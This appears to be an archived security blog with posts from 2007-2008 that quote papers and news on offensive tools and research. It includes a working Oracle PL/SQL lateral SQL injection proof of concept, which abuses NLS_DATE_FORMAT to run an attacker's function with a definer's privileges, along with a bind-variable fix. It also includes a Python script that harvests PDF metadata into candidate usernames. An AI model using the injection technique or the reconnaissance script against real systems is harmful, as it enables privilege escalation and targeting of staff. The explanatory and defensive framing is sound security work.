Lateral SQL injection

•April 28, 2008 • Leave a Comment

“How can an attacker exploit a PL/SQL procedure that doesn’t even take user input? Or how does one do SQL injection using DATE or even NUMBER data types? In the past this has not been possible but as this paper will demonstrate, with a little bit of trickery, you can in the Oracle RDBMS.”
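To make the quoted claim concrete, here is an added example (constructed for this post, not taken from the paper or from any Oracle code). It rests on documented Oracle behaviour: when a DATE is concatenated into a string, it is implicitly converted with the session's NLS_DATE_FORMAT, any user can change that setting with ALTER SESSION, and text enclosed in double quotes inside a format model is copied to the output literally. The schema APP, user X, and the objects RUN_LOG, PROOF, LOG_RUN and F are placeholders.

```sql
-- Added example, not from the paper. Assumed objects: schema APP owns the
-- definer-rights procedure LOG_RUN and table RUN_LOG(STAMP VARCHAR2(64),
-- NOTE VARCHAR2(100)); low-privileged user X has CREATE SESSION, CREATE
-- PROCEDURE, CREATE TABLE and EXECUTE on APP.LOG_RUN, nothing else.

-- 1. The "safe" procedure: no parameters, only SYSDATE is concatenated.
CREATE OR REPLACE PROCEDURE app.log_run AS
  v_sql VARCHAR2(4000);
BEGIN
  -- SYSDATE is a DATE, so it looks impossible to smuggle a quote through it.
  -- But || converts it to text using the *session's* NLS_DATE_FORMAT.
  v_sql := 'INSERT INTO app.run_log (stamp, note) VALUES ('''
        || SYSDATE || ''', ''nightly run'')';
  EXECUTE IMMEDIATE v_sql;
END;
/

-- 2. Attacker (user X): a function that records the privilege context it ran
--    in. AUTHID CURRENT_USER means that, when it is called from inside APP's
--    definer-rights procedure, CURRENT_USER is APP rather than X.
CREATE TABLE x.proof (session_user VARCHAR2(30), current_user VARCHAR2(30));

CREATE OR REPLACE FUNCTION x.f RETURN VARCHAR2 AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;   -- DML is otherwise not allowed from a query
BEGIN
  INSERT INTO x.proof VALUES (SYS_CONTEXT('USERENV', 'SESSION_USER'),
                              SYS_CONTEXT('USERENV', 'CURRENT_USER'));
  COMMIT;
  RETURN '';
END;
/
GRANT EXECUTE ON x.f TO PUBLIC;

-- 3. The trick. Double-quoted text in a date format model is emitted as-is,
--    and '' inside a SQL literal is one quote, so the format model becomes:
--        "'||x.f()||'"
ALTER SESSION SET NLS_DATE_FORMAT = '"''||x.f()||''"';

-- SYSDATE now renders as   '||x.f()||'   and the procedure builds
--   INSERT INTO app.run_log (stamp, note) VALUES (''||x.f()||'', 'nightly run')
-- X.F runs inside APP's statement and X.PROOF receives a row (X, APP).
EXEC app.log_run;

-- NUMBER is much harder to abuse this way: NLS_NUMERIC_CHARACTERS only lets
-- the session choose two single characters (decimal and group separator).

-- 4. Fix: bind every value, including values of "safe" types.
CREATE OR REPLACE PROCEDURE app.log_run AS
BEGIN
  EXECUTE IMMEDIATE
    'INSERT INTO app.run_log (stamp, note) VALUES (:d, :n)'
    USING TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS'), 'nightly run';
END;
/
```

The point of the fixed version is not the explicit TO_CHAR (an attacker cannot influence an explicit format model) but the bind variables: once nothing is spliced into the statement text, the session's NLS settings stop being part of the attack surface. Auditing for this means grepping PL/SQL for `EXECUTE IMMEDIATE`, `DBMS_SQL` and `OPEN ... FOR` with `||` in the statement string, regardless of the types being concatenated.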


Automated exploits from patches

•April 25, 2008 • Leave a Comment

“The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P’, automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P’. In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for vulnerable programs based upon patches provided via Windows Update.

In many cases we are able to automatically generate exploits within minutes or less.”


•April 22, 2008 • Leave a Comment

“Metagoofil is an information gathering tool designed for extracting the Meta-Data of public documents (pdf,doc,xls,ppt,etc) available on target/victim websites. It will generate a html page with the results of the Meta-Data extracted, plus a list of potential usernames.”
Download from Packetstorm
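As an added illustration of what this class of tool does (constructed example code, not Metagoofil itself), the functions below pull Author, Creator and Producer out of a PDF's Info dictionary and turn the author name into candidate login names. The two PDFs are minimal constructed byte strings with uncompressed Info dictionaries; real documents also require handling of object streams and XMP metadata, and Office formats store the same fields in OLE or OOXML properties, none of which this example covers.

```python
import re
from typing import Dict, List

# Constructed sample "documents": minimal PDF skeletons whose Info dictionary
# is stored uncompressed, which is all this example parses.
SAMPLE_PDFS: Dict[str, bytes] = {
    "budget.pdf": (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"3 0 obj << /Title (Q3 \\(draft\\)) /Author (Jane Smith) "
        b"/Creator (Microsoft Office Word) >> endobj\n"
        b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
    ),
    "org-chart.pdf": (
        b"%PDF-1.5\n"
        b"4 0 obj << /Author <FEFF004A006F0068006E0020004C00650065> "
        b"/Producer (Acrobat Distiller) >> endobj\n"
        b"trailer << /Info 4 0 R >>\n%%EOF\n"
    ),
}

# A PDF string is either a (literal) with backslash escapes or a <hex> string.
_PDF_STRING = rb"(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)"


def _decode_pdf_string(raw: bytes) -> str:
    """Decode a PDF literal (...) or hex <...> string to text."""
    if raw.startswith(b"<"):
        text = bytes.fromhex(re.sub(rb"\s", b"", raw[1:-1]).decode("ascii"))
    else:
        def repl(m: "re.Match[bytes]") -> bytes:
            esc = m.group(1)
            if esc.isdigit():                      # \ddd octal escape
                return bytes([int(esc, 8) & 0xFF])
            return {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(esc, esc)
        text = re.sub(rb"\\([0-7]{1,3}|.)", repl, raw[1:-1])
    if text.startswith(b"\xfe\xff"):               # UTF-16BE text string with BOM
        return text[2:].decode("utf-16-be")
    return text.decode("latin-1")                  # PDFDocEncoding is Latin-1-like for names


def pdf_metadata(data: bytes, keys=(b"Author", b"Creator", b"Producer")) -> Dict[str, str]:
    """Pull selected Info-dictionary keys out of an uncompressed PDF."""
    found: Dict[str, str] = {}
    for key in keys:
        m = re.search(rb"/" + key + rb"\s*" + _PDF_STRING, data)
        if m:
            found[key.decode()] = _decode_pdf_string(m.group(1))
    return found


def username_candidates(author: str) -> List[str]:
    """Login-name forms commonly built from a 'First Last' author field."""
    parts = [p for p in re.split(r"[\s.]+", author.lower()) if p.isalpha()]
    if len(parts) < 2:
        return parts
    first, last = parts[0], parts[-1]
    return [first + last, first[0] + last, first + "." + last, last + first[0]]


def harvest(docs: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each document to the usernames its Author field suggests."""
    result: Dict[str, List[str]] = {}
    for name, data in docs.items():
        author = pdf_metadata(data).get("Author")
        result[name] = username_candidates(author) if author else []
    return result


if __name__ == "__main__":
    for doc, names in harvest(SAMPLE_PDFS).items():
        print(doc, "->", ", ".join(names) or "(no author)")
```

The Creator and Producer strings are worth keeping alongside the names: they reveal the office suite and version a target runs, which is the other thing metadata harvesting is used for during reconnaissance. The defensive counterpart is equally simple: strip Info and XMP dictionaries from documents before publishing them.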

Java on SIM cards?

•March 27, 2008 • 1 Comment

“In 2007 two lonely THC researchers set about to install a java applet onto a SIM remotely.
The SIM runs a JVM which is very powerful. It’s possible to open gprs connection, make phone calls or redirect phone calls (e.g. remote phone tapping).”


MiFare RFID encryption hacked

•March 27, 2008 • Leave a Comment

“NXP developed the Mifare Classic RFID (radio frequency identification) chip, which is used in 2 million Dutch building access passes, said ter Horst. One billion passes with the technology have been distributed worldwide, making the security risk a global problem. A spokesperson for the ministry told Webwereld, an IDG affiliate, that it had not yet notified other countries.

The warning comes in a week when two research teams independently demonstrated hacks of the chip’s security algorithm.

On Monday, German researchers Karsten Nohl and Henryk Plötz, who first hacked parts of the chip last December, published a paper demonstrating a way to crack the chip’s encryption technology. The duo declined to publicly demonstrate their hack. “We want to start a discussion first, allowing people to adjust or abandon their systems,” Nohl told Webwereld last week. He added that he would provide a demonstration before June.”

Unlock Windows with Firewire

•March 27, 2008 • Leave a Comment

“A security consultant based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.
… merely by plugging in your Firewire cable and running a command”.

Get the source

Bluediving 0.9

•December 27, 2007 • Leave a Comment

Hi there and greets from 24th Chaos Communication Congress.
Here’s a new release of Bluediving – The next generation Bluetooth security tool.
What’s new in 0.9?

– minor tools compile bugfixes by fireangel148
– minor compile bugfixes by niekt
– minor menu management / sound check bugfix by niekt
– now compiles redfang
– Bugfixes in loop mode
– Scan for specific device type

Click && HF